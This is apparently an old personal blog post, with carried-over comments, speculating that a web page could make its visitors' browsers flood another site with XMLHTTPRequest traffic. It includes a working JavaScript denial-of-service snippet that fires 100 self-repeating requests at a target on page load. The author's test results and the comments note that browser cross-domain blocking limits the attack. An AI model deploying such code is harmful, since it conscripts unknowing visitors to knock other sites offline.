Maybe the XMLHTTPRequest handler isn’t such a good idea…
Right, so I was thinking about the XMLHTTPRequest handler. Well, okay, actually, I was thinking of Sandra Bullock, and this idea popped into my head…
You can use XMLHTTPRequests to make requests of a web server. Fair enough. And you can make requests of another site – check. And you can make many of them on one page – yup. And finally, you don’t have to do anything with the response – you see where I’m going with this yet?
Assume you have a function for creating XMLHTTPRequest objects. Consider the following:
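For reference, that factory might look something like this – `GetXMLHTTPRequest` is the name I use below, but the body here is just a sketch of the usual cross-browser pattern (native object where available, ActiveX fallback for IE6):

```javascript
// A simple cross-browser factory for XMLHTTPRequest objects.
// Modern browsers expose XMLHttpRequest natively; IE6 needs ActiveX.
function GetXMLHTTPRequest () {
    if (typeof XMLHttpRequest != 'undefined') {
        return new XMLHttpRequest();
    }
    // IE6 fallback - the progID varies with the installed MSXML version
    try {
        return new ActiveXObject("Msxml2.XMLHTTP");
    } catch (e) {
        return new ActiveXObject("Microsoft.XMLHTTP");
    }
}
```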
var urlTarget = 'http://www.example.com/'; // The site we want to DOS
var aStack = []; // Keep references so the objects aren't garbage-collected

// Returns a handler that fires off a fresh request each time
// the current one completes
function fnHTTP (oHTTP) {
    return function () {
        if (oHTTP.readyState == 4) {
            oHTTP.open("GET", urlTarget, true);
            oHTTP.send(null);
        }
    };
}

function setupDOS () {
    for (var i = 0; i < 100; i++) {
        var oHTTP = GetXMLHTTPRequest();
        oHTTP.open("GET", urlTarget, true);
        oHTTP.onreadystatechange = fnHTTP(oHTTP);
        oHTTP.send(null);
        aStack.push(oHTTP);
    }
}

window.onload = setupDOS;
So, a user goes to a page. In the background, after they’ve loaded the page, JavaScript is creating a whole load of XMLHTTPRequest objects, and then using these to make requests of a target site. And as each object gets serviced, it makes another request.
Thus, if you had 1,000 users, they could be making 100,000 requests of another site. And the requests would be from 1,000 different clients. Isn’t that the point of a denial of service attack? I mean, imagine if this were put on Slashdot!
I haven’t actually tried this yet – I might knock something up over the next week – but I can’t see anything that would prevent this. Did I miss anything? Is this not possible?
Update: So I wrote a script to try it. You can download it here. Basically, as is often the way, Firefox is well thought out and safe – it refuses to open an XMLHTTPRequest to a different domain. Good behaviour, I reckon. IE6, though, warns you about active content without being very specific – and if you allow the active content, the code you can download works just fine, thank you. So, all you need to do is put some dynamic content on the page so that your IE6 users allow active content, and you’re away – DOS galore!
Comments from my old blog:
I had a response from Nicholas Zakas ( http://www.nczonline.net/ ):
“I *think* IE6 SP2 effectively protects against that by disallowing cross-domain requests. I know you said that you get a simple warning about active content, but I think that only happens if you’re running the file locally. If you run it on a server, I believe that you’d just be blocked. So, in order to create a serious DDOS, you’d have to have people go to the Web site, download the file, open it, and click “I don’t care” to the IE warning. While I understand your concern, I don’t think it’s a huge security hole at this point.”
Indeed, he’s right – IE6 SP2 does disallow cross-domain requests when the file isn’t being run locally. It’s still a little worrying – most of the manuals for the various products I work with ship as HTML with ‘active content’, for example – but clearly you’re then relying on some form of social engineering, and you won’t get as much (or, probably, enough) activity to have a serious effect.